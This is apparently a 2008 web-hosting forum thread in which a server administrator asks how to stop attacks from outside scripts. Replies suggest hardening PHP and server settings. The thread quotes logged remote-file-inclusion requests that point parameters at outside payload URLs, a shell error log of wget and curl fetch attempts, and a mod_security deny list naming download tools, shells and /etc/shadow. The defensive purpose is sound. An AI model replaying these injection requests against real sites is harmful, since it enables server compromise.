mod_security.. useless!

mo.mentum

Verified User
Joined
Jun 9, 2004
Messages
37
Hello,

I've been dealing with this problem on several servers for some time now. From time to time, there always seems to be some user's site that uses some outdated forum script or something, that ends up allowing a hacker to run perl script using apache.

I've done the usual thing of disabling wget and other transfer proggies. I also installed mod_security. But they still get through!

I see stuff like this in my error_log all the time:
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/curl: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/lwp-download: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: lynx: command not found
sh: fetch: command not found
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.

I just can't figure out which site is being exploited to do this. They try a bunch of things that don't work. Then eventually, I'm not sure who, they end up able to execute their code which results in apache executing a couple of perl scripts that run themselves as apache and show up as such in "ps auxww" and "top". I have to manually kill them each time.

Is there anything I can do to stop this??
 
Its not useless at all. Do you rely on mod_security to be your only line of defense? Mod Sec should be but one means of security but certainly not the only. If your rules are stellar then mod sec will take care of almost all of them. Certainly it will not stop a spammer from compromising a 3rd party application in a module that included in the Gallery for instance or it will not prevent sombody compromising an account where the password has been sniffed but it certainly does its job for what its worth. If your server has been compromised based off a user site that was compromised this tells me you have taken no further action to secure anything outside of the users webspace.
 
sh: /usr/bin/wget: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/curl: Permission denied
Can't open perl script "baru.txt": No such file or directory.
Use -S to search $PATH for it.
sh: /usr/bin/lwp-download: Permission denied
If a hacker was able to execute these commands, that means your server is likely compromised. I suggest you seek help from your host, or you can seek professional help to look into your server to assess the damage, secure and harden your server.
 
Try to do these things

1. Check for rootkit by rkhunter and chkrootkit
2. mount /tmp noexec,nosuid
3. Turn ON open_basedir for all domains
4. Disable functions in php.ini eg. exec passthru system ...
5. Did you load any security rules for mod_security or just installed it?
 
It doesn't necessarily mean that the server is "compromised", these could be failed attempts.

RKhunter and chkroot are great tools; but this could be as you write, the result of an insecure PHP script that's letting stuff in through G/P parameters. GREP your user scripts for calls to any function listed here:

http://ca.php.net/manual/en/ref.exec.php

and backticks as well! These functions should generally be disabled in a shared environment nonetheless, and you should have every user confined to their home folder open_basedir on the most recent version of the PHP sapi that you use.

disabled exec and open_basedir should prevent these types of things.

And get rid of Perl ;)
 
Hi guys. Thanks for the input! Ok now i have a basic ruleset in there for mod_sec. But I still get lots of requests like the ones you will see attached below. Now i went ahead and download the scripts that this code tries to put on the server, went through it, and saw the different commands they attempt to run to get their malicious code on the server, and i chmod'ed all of it to 700. But would still like to catch them before they even try. Anyone have a solid ruleset for mod_sec? I've included mine below the hack attempts!

Now i know, i could go around and tell my clients to clean up their code as to not allow this, but i have hundreds of clients spread over a dozen servers. Not feasable.

[1]
******.com.log:geckowebhost.com - - [10/Feb/2008:09:47:30 -0500] "GET
//index.php?selskin=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 200 43 "-" "libwww-perl/5.808"

******.com.log:222.239.227.171 - - [10/Feb/2008:10:00:39 -0500] "GET //index.php?selskin=
http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 200 43 "-" "libwww-perl/5.65"

[2]
******.log:fjo66.internetdsl.tpnet.pl - - [10/Feb/2008:08:54:33 -0500] "GET /
index.php?x=http://www.immo.plocknet.eu/me.txt??? HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"


[3]
******.org.log:wpc1639.amenworld.com - - [10/Feb/2008:01:52:40 -0500] "GET
/agenda/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 79 "-"
"libwww-perl/5.79"

******.org.log:wpc1639.amenworld.com - - [10/Feb/2008:01:53:28 -0500] "GET
/tools/send_reminders.php?noSet=0&includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-"
"libwww-perl/5.79"


[4]
******.com.log:cpe00123fb0b178-cm0012c9daef0c.cpe.net.cable.rogers.com - - [10/Feb/2008:12:13:39 -0500] "GET
/fr/news/index.php?id_news=http://migirlsadaoiwqiseatmeisum.mail333.su/body? HTTP/1.1" 200 14517 "-" "Mozilla/4.0 (compatible;
MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"


[5]
******.com.log:c-71-60-166-84.hsd1.pa.comcast.net - - [10/Feb/2008:08:35:51 -0500] "GET
/index.php?option=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 69 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT
5.1; .NET CLR 1.1.4322)"


[6]
******.com.log:84.53.83.254 - - [10/Feb/2008:13:32:24 -0500] "GET
//templates/headline_temp.php?nst_inc=http://www.viperwarez.com/ownd/yes.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79"


[7]
******.ca.log:srv017.infobox.ru - - [10/Feb/2008:08:59:38 -0500] "GET
//includes/kb_constants.php?module_root_path=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 - "-"
"libwww-perl/5.803"
 
Oh. Here's my mod_sec


<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On

# Change Server: string
SecServerSignature "Apache"


# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off

# The audit engine works independently and
# can be turned On of Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly

# The name of the audit log file
SecAuditLog logs/audit_log

# Should mod_security inspect POST payloads
SecFilterScanPOST On

# Action to take by default
SecFilterDefaultAction "deny,log,status:403"

## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ##

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "httpds "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
SecFilterSelective THE_REQUEST "arta\.zip "
SecFilterSelective THE_REQUEST "cmd=cd\x20/var "
SecFilterSelective THE_REQUEST "HCL_path=http "
SecFilterSelective THE_REQUEST "clamav-partial "
SecFilterSelective THE_REQUEST "vi\.recover "
SecFilterSelective THE_REQUEST "netenberg "
SecFilterSelective THE_REQUEST "psybnc "
SecFilterSelective THE_REQUEST "fantastico_de_luxe "
SecFilterSelective THE_REQUEST "90\.txt "


SecFilter "bcc:"
SecFilter "bcc\x3a"
SecFilter "cc:"
SecFilter "cc\x3a"
SecFilter "bcc:|Bcc:|BCC:" chain
SecFilter "[A-Z0-9._%-]+@[A-Z0-9._%-]+\.[A-Z]{2,4}\,\x20[A-Z0-9._%-]+@[A-Z0-9._%-]+\.[A-Z]{2,4}"
SecFilterSelective POST_PAYLOAD "Bcc:"
SecFilterSelective POST_PAYLOAD "Bcc:\x20"
SecFilterSelective POST_PAYLOAD "cc:"
SecFilterSelective POST_PAYLOAD "cc:\x20"
SecFilterSelective POST_PAYLOAD "bcc:"
SecFilterSelective POST_PAYLOAD "bcc:\x20"
SecFilterSelective POST_PAYLOAD "bcc: "
SecFilterSelective THE_REQUEST "Bcc:"
SecFilterSelective THE_REQUEST "Bcc:\x20"
SecFilterSelective THE_REQUEST "cc:"
SecFilterSelective THE_REQUEST "cc:\x20"
SecFilterSelective THE_REQUEST "bcc:"
SecFilterSelective THE_REQUEST "bcc:\x20"
SecFilterSelective THE_REQUEST "bcc: "
# WEB-PHP phpbb quick-reply.php arbitrary command attempt
SecFilterSelective THE_REQUEST "/quick-reply\.php" chain
SecFilter "phpbb_root_path="

#!-- Debut ajout du 26 janvier 2008


SecFilter "/usr/local/apache"
SecFilter "/usr/local/mysql"
SecFilter "/usr/X11R6/bin/xterm"
SecFilter "/etc/inetd\.conf" log,pass
SecFilter "/etc/shadow" log,pass
SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter "conf/httpd\.conf" log,pass
SecFilter "HTTP/1\.1 403"
SecFilter "cmd32\.exe"
SecFilter "cmd\.exe"
SecFilter "\.cmd\?&"
SecFilter "document\.domain\("
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilterSelective ARG_highlight %27
SecFilterSelective ARG_highlight %2527
SecFilterSelective OUTPUT "Fatal error:"
SecFilterSelective OUTPUT "Volume Serial Number"
SecFilterSelective OUTPUT "Command completed"
SecFilterSelective OUTPUT "Bad command or filename"
SecFilterSelective OUTPUT "file(s) copied"
SecFilterSelective OUTPUT "Index of /cgi-bin/"
SecFilterSelective OUTPUT ".*uid\=\("
SecFilterSelective OUTPUT ".*gid\=\("
SecFilterSelective THE_REQUEST "/cgi-bin/ls" log,pass
SecFilterSelective THE_REQUEST "/\.bash_history"
SecFilterSelective THE_REQUEST "/_vti_bin/" log,pass
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
SecFilterSelective THE_REQUEST "/~backup"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "/bin/ps"
SecFilterSelective THE_REQUEST "/usr/bin/id"
SecFilterSelective THE_REQUEST "/bin/kill"
SecFilterSelective THE_REQUEST "/usr/bin/chsh"
SecFilterSelective THE_REQUEST "/usr/bin/gcc"
SecFilterSelective THE_REQUEST "/usr/bin/cc"
SecFilterSelective THE_REQUEST "/usr/bin/cpp"
SecFilterSelective THE_REQUEST "/usr/bin/g\+\+"
SecFilterSelective THE_REQUEST "/bin/python"

SecFilter "/bin/sh"
SecFilter "/bin/bash"
SecFilter "/bin/tclsh"
SecFilter "/bin/ls"
SecFilter "/bin/echo"
SecFilter "/bin/python"
SecFilter "/bin/kill"
SecFilter "/bin/chmod"
SecFilter "/bin/cc"
SecFilter "/bin/uname"
SecFilter "/usr/bin/whoami"
SecFilter "/bin/gcc"
SecFilter "/chgrp"
SecFilter "/chown"
SecFilter "/etc/passwd"
SecFilter "/boot"
SecFilter "/etc"
SecFilter "/initrd"
SecFilter "/lost+found"
SecFilter "/mnt"
#SecFilter "/proc"
SecFilter "/root"
SecFilter "/sbin"
SecFilter "/var"
SecFilter "/usr/local/apache"
SecFilter "/usr/local/mysql"
SecFilter "/usr/X11R6/bin/xterm"
SecFilter "/etc/inetd\.conf" log,pass
SecFilter "/etc/shadow" log,pass
SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter "conf/httpd\.conf" log,pass
SecFilter "HTTP/1\.1 403"
SecFilter "cmd32\.exe"
SecFilter "cmd\.exe"
SecFilter "\.cmd\?&"
SecFilter "document\.domain\("
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilter "_PHPLIB[libdir]"
SecFilter "cd\x20/tmp"
SecFilter "wget\x20"

</IfModule>
 
Now i know, i could go around and tell my clients to clean up their code as to not allow this, but i have hundreds of clients spread over a dozen servers. Not feasable.
Wholly feasible. Again, just edit your disabled functions in php.ini to include all of the shell exec commands I previously noted, and these types of scripts will be blocked at the source. If you additionally disable allow_url_fopen and allow it on a per-use basis for trusted customers, you'd be preventing these things from occurring entirely.
 
Back
Top